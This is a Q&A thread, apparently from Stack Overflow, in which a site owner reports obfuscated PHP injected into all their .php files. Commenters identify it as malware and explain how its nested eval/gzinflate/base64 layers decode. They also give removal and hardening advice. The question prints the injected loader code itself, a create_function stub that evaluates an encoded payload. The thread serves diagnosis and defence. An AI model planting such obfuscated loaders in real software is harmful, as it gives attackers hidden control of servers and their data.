# Piece of code in all my .php files?

Tags: php, mysql

Out of nothing this piece of code is auto created in all `.php` files on my server.

```
<?php
$md5 = "a706891c46c31c80594f989327e52c0d";
$a7 =    array(';','6','i','l',"z",'4','t',')','e',"b",'(','_',"o","g","a","r","n","s");
$b70 =      create_function('$'.'v',$a7[8].$a7[18].$a7[4].$a7[19].$a7[6].$a7[7].$a7[7].$a7[0]);
$b70('DZdFsoUKEkSX0/8HA/wC0SPc3Zl04O7/4f');
?>
```

( full code http://codepad.org/HdnZfKm1 )

I tried to delete it manually from all the `.php` files  , but when it comes to `setup.php`(file that connect to MySQL ), if I delete it from there the website stop working. I don't know how to remove it. What are the consequences if I leave it as it is? What is this and how did it get in there?

Comment: You may have been hacked.

Comment: what?? how to remove it?

Comment: Replace instantly every file on your server with your backup-files

Comment: And your backup files have the vulnerability that allowed this to happen, so that's probably also not going to particularly help you.

Comment: what are the consequences?

Comment: In case you're curious this code "decodes" to: http://pastebin.com/ZZYcPtyu

Comment: @mwweb: The consequences are that the hacker can (and may have) access to everything on your server.  Files, databases, everything.

Comment: @RocketHazmat Hello, can you tel lme how you decode it?

Comment: @mwweb: The way I decoded it was pretty simple.  First, notice that the first 3 lines are just setting variables.  It's the last line where anything actually gets executed.  Then, I realized that [`create_function()`](https://secure.php.net/create_function) takes two string arguments.  So, changing `create_function` to `var_dump` (and commenting out the last line) helped start the decoding (see: http://codepad.org/dQqvV71G).  Now we know that `$b70` is a function which, when ran, will do `eval(gzinflate(base64_decode($v)));` (`$v` being the parameter passed when calling `$b70` as a function).

Comment: @mwweb: So, the next step is to change `$b70(...)` to `echo gzinflate(base64_decode(...));` to see what code was going to be `eval`ed (see: http://ideone.com/ewkICt [codepad.org didn't support `gzinflate()`]).  Interestingly, the code that inflates to contains *another* `eval(gzinflate(base64_decode(...)))` so we just take that, copy it and change `eval()` to `echo` to see what it would do (See: http://ideone.com/MTmTGX).  Turns out that contains *yet another* `eval(gzinflate(base64_decode(...)))`!  Keep changing `eval()` to `echo` until you get to the real code being ran.

Comment: @mwweb: A few more levels of `eval(gzinflate(base64_decode(...)))` remain: http://ideone.com/EV2xRR http://ideone.com/82Uau2 http://ideone.com/WDzohN http://ideone.com/vQFM0B http://ideone.com/tMB1GS http://ideone.com/j01zjC http://ideone.com/bQ4VCc http://ideone.com/bpUZjZ http://ideone.com/KlgqaH http://ideone.com/Mesq3s

Comment: @mwweb: There are ***WAY*** too many levels of `eval(gzinflate(base64_decode(...)))` here.  To continue, I used http://www.unphp.net/decode/d7e79d2701c19b4a3af191920f36ad88/ (there's also https://malwaredecoder.com/).  I pasted in http://pastebin.com/jAfDVLkU (this is from the *original* code, it's the last line with `$b70(...)` replaced with `eval(gzinflate(base64_decode(...)))`) and it was able to decode it to the final code.  The final code is: http://pastebin.com/ZZYcPtyu

Comment: @mwweb: The `$md5` variable is probably used by the payload that's executed when this is ran.  The payload is what's in the `/var/chroot/home/content/33/9059533/html/f/wp-content/plugins/really-static/static/p=5749/f57.php` file.

Comment: @RocketHazmat great, thanks a lot man.

Comment: @RocketHazmat i still have a lot of infected files on my site.

Comment: @mwweb: You may just want to delete everything and start over...

Comment: @RocketHazmat 2 days ago i find this http://pastebin.com/YgSBsapn

Comment: @RocketHazmat i remove the 3 malicious files 2 days ago.. but today i saw another one pastebin.com/YgSBsapn

Comment: @RocketHazmat how the hell can i decode that ? im going crazy

Comment: @mwweb: I think you need to shut down your website.  Update your wordpress to the latest version, then try again on a clean web host.

Comment: @RocketHazmat i dont have wordpress. i dont know how they get in.

Comment: @mwweb: You probably have some unescaped inputs on your site somewhere...

Answer (score 2, accepted):

Its a malware..

This article provides useful information about the malware.

[malware removal](http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v-1-0/)

Here are instructions for removing it.

[removal instructions](http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html)

Comment: thaks o lot. i added this line `disable_functions = create_function,gzinflate,eval,base64_decode` in php.ini and it works

Answer (score 0):

The best thing to do is restore from your version control system. You don't have one? That's the first thing you fix. Version control is **essential**.

Next is to compare against your backups to see when this change was made. You don't have backups? That's the next thing you fix.

Finally you should make sure your application software is up to date, that you're running the latest version of your web server and PHP. Do a security audit immediately. If you don't know how to do this, find someone who can to get some support. If you've been hit with this, there's a good chance whomever did this will come back and check up on their work and possibly re-hack you again if they can.

Comment: Thank you for your help. i added this line `disable_functions = create_function,gzinflate,eval,base64_decode` in php5.ini should this block it?

Comment: That blocks some attacks, but not all. These attacks vary in sophistication from automated drive-by attempts to someone singling out your system and trying to host something on it. The only way to be sure is to look for changes to your application code. `git diff` can do this in an instant.